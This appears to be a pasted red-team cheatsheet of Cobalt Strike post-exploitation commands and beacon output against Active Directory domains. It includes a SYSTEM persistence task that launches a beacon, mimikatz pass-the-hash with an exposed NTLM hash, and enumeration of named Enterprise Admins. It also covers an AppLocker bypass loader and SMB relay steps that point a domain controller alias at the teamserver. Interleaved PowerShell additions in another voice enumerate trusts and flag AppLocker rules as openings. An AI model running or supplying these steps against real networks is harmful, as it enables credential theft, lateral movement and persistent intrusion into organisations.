k54_Cheatsheet_Notes
savsanta
Nov 8th, 2022

Quickie Pastable
shell schtasks /create /S 192.168.105.104 /TN X-Cobalt-Strike-Remote-Persistence /TR C:\Windows\System32\testbeacon.exe /SC ONSTART /RU SYSTEM
shell schtasks /run /S 192.168.105.104 /TN X-Cobalt-Strike-Remote-Persistence
(The first line creates a task on the remote host that runs the beacon binary as SYSTEM at boot; the second fires it immediately instead of waiting for a reboot.)


# Finding trust domain relationships with dsquery. Use it to find things like Domain Admins or Enterprise Admins whose credentials we can reuse in a whole different domain (i.e. the Austin/Gretchel scenario).
shell dsquery * -filter (objectclass=trusteddomain) -attr flatname trusttype trustdirection -l


Tip 1) Bounce back between running dsquery from SYSTEM and from an actual user account, due to issues with some users not being authenticated (the "user has not been authenticated" error at the bottom of these notes).

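An added example (not from these notes) that does the same trust lookup from PowerShell, e.g. via the beacon's powershell/powerpick command, and decodes the numeric trustDirection, trustType and trustAttributes values that dsquery prints raw. It assumes the beacon's current token can bind LDAP to the domain being queried; the function name and the optional -SearchBase parameter are mine, not anything in the notes.

```powershell
# Added example, not part of the original notes. Enumerates trustedDomain
# objects and decodes the numeric fields that dsquery prints raw.
# Assumes the current token can bind LDAP to the domain being queried.
function Get-DomainTrustInfo {
    param(
        # Optional serverless LDAP path, e.g. 'LDAP://DC=gretchel,DC=local'.
        # Empty string = the default naming context of the current token's domain.
        [string]$SearchBase = ''
    )
    $root = if ($SearchBase) { [ADSI]$SearchBase } else { [ADSI]'' }
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    $searcher.Filter = '(objectClass=trustedDomain)'
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.AddRange(
        [string[]]@('flatname', 'trustpartner', 'trustdirection', 'trusttype', 'trustattributes'))

    # trustDirection is relative to the queried domain: Inbound = the partner trusts us.
    $directionNames = @{ 0 = 'Disabled'; 1 = 'Inbound'; 2 = 'Outbound'; 3 = 'Bidirectional' }
    $typeNames      = @{ 1 = 'Downlevel (NT4)'; 2 = 'Uplevel (AD)'; 3 = 'MIT Kerberos'; 4 = 'DCE' }
    # trustAttributes bit flags as defined in MS-ADTS.
    $attributeFlags = [ordered]@{
        0x01 = 'NON_TRANSITIVE'
        0x02 = 'UPLEVEL_ONLY'
        0x04 = 'QUARANTINED_DOMAIN (SID filtering on)'
        0x08 = 'FOREST_TRANSITIVE'
        0x10 = 'CROSS_ORGANIZATION (selective authentication)'
        0x20 = 'WITHIN_FOREST'
        0x40 = 'TREAT_AS_EXTERNAL'
        0x80 = 'USES_RC4_ENCRYPTION'
    }

    foreach ($result in $searcher.FindAll()) {
        $p = $result.Properties
        $attrs = [int]$p['trustattributes'][0]
        $flagNames = foreach ($bit in $attributeFlags.Keys) {
            if ($attrs -band $bit) { $attributeFlags[$bit] }
        }
        [pscustomobject]@{
            FlatName     = [string]$p['flatname'][0]
            Partner      = [string]$p['trustpartner'][0]
            Direction    = $directionNames[[int]$p['trustdirection'][0]]
            Type         = $typeNames[[int]$p['trusttype'][0]]
            Attributes   = (@($flagNames) -join ', ')
            # Parent/child and tree-root trusts: transitive, two-way, and no SID
            # filtering, so forest-root Enterprise Admins are usable across them.
            WithinForest = [bool]($attrs -band 0x20)
            SidFiltering = [bool]($attrs -band 0x04)
        }
    }
}

Get-DomainTrustInfo | Format-Table -AutoSize
```

Direction is from the perspective of the domain you queried. A WITHIN_FOREST trust (such as the gretchel/austin pair in these notes) is transitive and two-way, which is exactly why the Enterprise Admins listed further down are worth reusing in the other domain; for external or forest trusts, check the QUARANTINED_DOMAIN flag before assuming anything SID-history based will cross the boundary. Pass -SearchBase 'LDAP://DC=gretchel,DC=local' to query a specific domain when the token's own domain is not the one of interest.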
----
shell dsquery * -filter "(objectclass=computer)" -attr description samaccountname name operatingsystem dnshostname -d gretchel
[*] Tasked beacon to run: dsquery * -filter "(objectclass=computer)" -attr description samaccountname name operatingsystem dnshostname -d gretchel
[+] host called home, sent: 154 bytes
[+] received output:
dsquery failed:The server is not operational.
type dsquery /? for help.
[+] received output:
description samaccountname name operatingsystem dnshostname
GRETCHEL-DC1$ GRETCHEL-DC1 Windows Server 2012 R2 Standard gretchel-DC1.gretchel.local


[*] Tasked beacon to run: dsget group "CN=Enterprise Admins,CN=Users,DC=gretchel,DC=local" -members
[+] host called home, sent: 104 bytes
[+] received output:
"CN=Danson\, chris M,OU=Users,OU=IT,OU=HQ,DC=gretchel,DC=local"
"CN=Lazarus\, Alan W,OU=Users,OU=IT,OU=HQ,DC=gretchel,DC=local"
"CN=Laredo\, Daryl S,OU=Users,OU=IT,OU=HQ,DC=gretchel,DC=local"
"CN=Chen\, Tony F,OU=Users,OU=IT,OU=HQ,DC=gretchel,DC=local"
"CN=Administrator,CN=Users,DC=gretchel,DC=local"

shell dsget group "CN=Domain Admins,CN=Users,DC=gretchel,DC=local" -members
[*] Tasked beacon to run: dsget group "CN=Domain Admins,CN=Users,DC=gretchel,DC=local" -members
[+] host called home, sent: 100 bytes
[+] received output:
"CN=Administrator,CN=Users,DC=gretchel,DC=local"

beacon> shell nslookup gretchel-dc1
[*] Tasked beacon to run: nslookup gretchel-dc1
[+] host called home, sent: 52 bytes
[+] received output:
Server: gretchel-dc1.gretchel.local
Address: 172.16.1.10

beacon> shell dsquery server -forest
[*] Tasked beacon to run: dsquery server -forest
[+] host called home, sent: 53 bytes
[+] received output:
"CN=GRETCHEL-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=gretchel,DC=local"
"CN=AUS-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=gretchel,DC=local"
"CN=CHI-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=gretchel,DC=local"
"CN=CHI-DC2,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=gretchel,DC=local"
----
Weirdness around ls/shell dir of the directory on the parent DC. Only worked when I used the builtin ls of CS.

beacon> shell dir \\172.16.1.10\C$
[*] Tasked beacon to run: dir \\172.16.1.10\C$
[+] host called home, sent: 51 bytes
[-] could not spawn C:\Windows\system32\cmd.exe /C dir \\172.16.1.10\C$ (token) with extended startup information. Reset ppid, disable blockdlls, or rev2self to drop your token.
beacon> pth GRETCHEL.local\chris.danson.ea eda099c1520936a2966ab0c04b7a7296
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:chris.danson.ea /domain:GRETCHEL.local /ntlm:eda099c1520936a2966ab0c04b7a7296 /run:"%COMSPEC% /c echo 12719d8990e > \\.\pipe\4b2017" command
[+] host called home, sent: 297614 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : chris.danson.ea
domain : GRETCHEL.local
program : C:\Windows\system32\cmd.exe /c echo 12719d8990e > \\.\pipe\4b2017
impers. : no
NTLM : eda099c1520936a2966ab0c04b7a7296
| PID 3856
| TID 2496
| LSA Process is now R/W
| LUID 0 ; 190663225 (00000000:0b5d4a39)
\_ msv1_0 - data copy @ 000000D74557AFA0 : OK !
\_ kerberos - data copy @ 000000D745528F38
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000000D74560B0F8 (16) -> null

beacon> shell dir \\GRETCHEL-DC1\C$
[*] Tasked beacon to run: dir \\GRETCHEL-DC1\C$
[+] host called home, sent: 52 bytes
[-] could not spawn C:\Windows\system32\cmd.exe /C dir \\GRETCHEL-DC1\C$ (token) with extended startup information. Reset ppid, disable blockdlls, or rev2self to drop your token.
beacon> ls \\GRETCHEL-DC1\C$
[*] Tasked beacon to list files in \\GRETCHEL-DC1\C$
[+] host called home, sent: 35 bytes
[*] Listing: \\GRETCHEL-DC1\C$\


beacon> ls \\GRETCHEL-DC1\sysvol
[*] Tasked beacon to list files in \\GRETCHEL-DC1\sysvol
[+] host called home, sent: 39 bytes
[*] Listing: \\GRETCHEL-DC1\sysvol\

Size Type Last Modified Name
---- ---- ------------- ----
dir 08/09/2022 09:54:27 gretchel.local

### rev2self verifies that you do need pass-the-hash, as now I can't ls anything
beacon> rev2self
[*] Tasked beacon to revert token
[+] host called home, sent: 8 bytes
beacon> ls \\GRETCHEL-DC1\sysvol
[*] Tasked beacon to list files in \\GRETCHEL-DC1\sysvol
[+] host called home, sent: 39 bytes
[-] could not open \\GRETCHEL-DC1\sysvol\*: 5
beacon> ls \\GRETCHEL-DC1\C$
[*] Tasked beacon to list files in \\GRETCHEL-DC1\C$
[+] host called home, sent: 35 bytes
[-] could not open \\GRETCHEL-DC1\C$\*: 5

Note on the "could not spawn ... (token) with extended startup information" failures above: shell spawns cmd.exe, and Beacon refuses to do that under an impersonated token while ppid/blockdlls are configured, exactly as the error says. The builtin ls spawns nothing; it lists the share with Win32 API calls from inside the beacon process using the pth token, which is why it works. The error code 5 after rev2self is ERROR_ACCESS_DENIED.


#### How to find the 2F token number used as their logon sAMAccountName for the Workstation Admin accounts that have remote logon capability, using dsquery


### Socks
You have to have SOCKS AND PORTFWD together; they aren't interchangeable when trying to hit the SSH port through socks/proxychains.


# AppLocker Script rules as stored in the registry (SrpV2 is the AppLocker policy key; these are the two default Script rules)
beacon> reg query x64 HKLM\software\policies\microsoft\windows\srpv2\Script\9428c672-5fc3-47f4-808a-a0011f36dd2c
[*] Tasked beacon to query HKLM\software\policies\microsoft\windows\srpv2\Script\9428c672-5fc3-47f4-808a-a0011f36dd2c (x64)
[+] host called home, sent: 2701 bytes
[+] received output:
Value <FilePathRule Id="9428c672-5fc3-47f4-808a-a0011f36dd2c" Name="(Default Rule) All scripts located in the Windows folder" Description="Allows members of the Everyone group to run scripts that are located in the Windows folder." UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePathCondition Path="%WINDIR%\*"/></Conditions></FilePathRule>

beacon> reg query x64 HKLM\software\policies\microsoft\windows\srpv2\Script\ed97d0cb-15ff-430f-b82c-8d7832957725
[*] Tasked beacon to query HKLM\software\policies\microsoft\windows\srpv2\Script\ed97d0cb-15ff-430f-b82c-8d7832957725 (x64)
[+] host called home, sent: 2701 bytes
[+] received output:
Value <FilePathRule Id="ed97d0cb-15ff-430f-b82c-8d7832957725" Name="(Default Rule) All scripts" Description="Allows members of the local Administrators group to run all scripts." UserOrGroupSid="S-1-5-32-544" Action="Allow"><Conditions><FilePathCondition Path="*"/></Conditions></FilePathRule>

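An added example (not from the original notes) that walks every AppLocker rule collection under the SrpV2 key shown above, parses the rule XML that reg query prints as a raw string, and flags the broad Everyone Allow path rules such as the %WINDIR%\* default rule. It assumes the standard policy key location; the function name is mine, and the meaning assigned to the collection-level EnforcementMode DWORD is my reading of the registry layout, not something the notes state.

```powershell
# Added example, not part of the original notes. Dumps every AppLocker rule
# collection under SrpV2 and parses the rule XML that reg query shows raw.
# Assumes the standard policy key; EnforcementMode meaning is an assumption.
function Get-SrpV2Rules {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2'
    if (-not (Test-Path $base)) { Write-Warning "No AppLocker policy under $base"; return }

    foreach ($collection in Get-ChildItem $base) {
        # Collection-level DWORD: 1 = enforce, 0 = audit only, absent = not configured.
        $mode = (Get-ItemProperty $collection.PSPath -ErrorAction SilentlyContinue).EnforcementMode
        foreach ($ruleKey in Get-ChildItem $collection.PSPath) {
            # Each rule GUID key stores its XML in the 'Value' string (what reg query showed).
            $xmlText = (Get-ItemProperty $ruleKey.PSPath -ErrorAction SilentlyContinue).Value
            if (-not $xmlText) { continue }
            try { $rule = ([xml]$xmlText).DocumentElement } catch { continue }

            # Use GetAttribute(): PowerShell's XML adapter resolves $rule.Name to the tag name.
            $cond = $rule.SelectSingleNode('Conditions/*')
            if (-not $cond) { continue }
            $path = if ($rule.LocalName -eq 'FilePathRule') { $cond.GetAttribute('Path') } else { '' }
            $condition = switch ($rule.LocalName) {
                'FilePathRule'      { $path }
                'FilePublisherRule' { '{0} | {1} | {2}' -f $cond.GetAttribute('PublisherName'), $cond.GetAttribute('ProductName'), $cond.GetAttribute('BinaryName') }
                'FileHashRule'      { (@($cond.SelectNodes('FileHash') | ForEach-Object { $_.GetAttribute('SourceFileName') })) -join ', ' }
                default             { $cond.OuterXml }
            }
            [pscustomobject]@{
                Collection  = $collection.PSChildName
                Enforcement = $mode
                RuleType    = $rule.LocalName
                Name        = $rule.GetAttribute('Name')
                Sid         = $rule.GetAttribute('UserOrGroupSid')
                Action      = $rule.GetAttribute('Action')
                Condition   = $condition
                # Allow + Everyone (S-1-1-0) + wildcard path: check that tree for
                # directories a low-privileged user can write to.
                Broad       = ($rule.GetAttribute('Action') -eq 'Allow' -and
                               $rule.GetAttribute('UserOrGroupSid') -eq 'S-1-1-0' -and
                               $path.Contains('*'))
            }
        }
    }
}

Get-SrpV2Rules | Sort-Object Collection, RuleType, Name | Format-Table -AutoSize
```

The %WINDIR%, %SYSTEM32%, %PROGRAMFILES% and %OSDRIVE% tokens in path conditions are AppLocker path variables, not environment variables, so resolve them by hand before checking ACLs. A Broad=True rule for Everyone on %WINDIR%\* is what makes the execute-assembly loader in the next note worthwhile: anything dropped into a user-writable subdirectory of that tree runs as an allowed script, while the Administrators rule (S-1-5-32-544) allows everything from an elevated context anyway.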
# The syntax to run dsquery.exe through a custom C# application-whitelist (AppLocker) bypass loader
# beacon> execute-assembly /mnt/supershare/applocker-bypas/applby.exe C:\transfer\dsquery.exe * -filter *


# Port forwarding to relay SMB authentication requires some KEY THINGS

Cobalt Strike Client (1) ---> CS Teamserver (2) ----> Customer machine on the local customer network (3) ----> Customer target domain controller for SMB auth (4)

1. The portfwd should be run on machine 3 with the target IP of the DC (machine 4) and target port 445.
2. The SMB auth relay via pass-the-hash must be relayed through an additional (not depicted in the diagram) machine: a Windows box with an implant calling back to the teamserver as SYSTEM.
3. On the Windows relayer box, edit the hosts file (%SystemRoot%\System32\drivers\etc\hosts, the Windows equivalent of /etc/hosts) to add a DNS-name alias for the target customer domain controller, but put the out-of-band IP of the Kali teamserver as the address.
4. Execute the pass-the-hash on the beacon that corresponds to your Windows relayer box. Make sure you are SYSTEM.
5. Execute all "passing queries" on the Windows relayer box (shell dir \\TARGETDC\C$\).



------
When you get the error:
dsquery failed:The operation being requested was not performed because the user has not been authenticated.
type dsquery /? for help.

try running with the -d parameter (which connects to a DC in the named domain) if using a cross-domain trust:
beacon> shell dsquery * -filter (name=*web*) -attr * -d austin
[*] Tasked beacon to run: dsquery * -filter (name=*web*) -attr * -d austin
[+] host called home, sent: 79 bytes
[+] received output:
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
objectClass: computer
cn: AUS-WEB